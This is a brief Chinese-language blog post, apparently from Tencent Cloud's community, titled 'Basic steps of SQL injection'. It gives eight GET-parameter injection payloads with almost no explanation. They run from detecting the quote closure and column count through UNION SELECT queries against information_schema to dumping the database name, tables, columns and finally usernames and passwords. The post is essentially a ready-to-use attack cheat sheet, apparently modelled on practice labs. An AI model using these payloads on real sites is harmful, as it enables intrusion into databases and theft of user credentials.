前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >SQL注入的基本步骤

SQL注入的基本步骤

作者头像
行云博客
发布2020-07-29 15:48:32
9780
发布2020-07-29 15:48:32
举报
文章被收录于专栏:行云博客行云博客
GET类型
1.判断是字符型还是数字型

​ 2-1

2.通过报错判断闭合符

​ " ’ ​ ‘’ LIMIT 0,1

3.确认查询的字段数量

order by 3

4.确认占位信息

union select 1,2,3 --+

5.爆库名

union select 1,2,database() --+

6.爆表名

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sql'--+

7.爆表字段

union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sql' and table_name='users'--+

8.爆用户名和密码

union select 1,2,group_concat(concat_ws(',',username,password) SEPARATOR '|') from users --+

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2020-07-27 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • GET类型
    • 1.判断是字符型还是数字型
      • 2.通过报错判断闭合符
        • 3.确认查询的字段数量
          • 4.确认占位信息
            • 5.爆库名
              • 6.爆表名
                • 7.爆表字段
                  • 8.爆用户名和密码
                  领券
                  问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档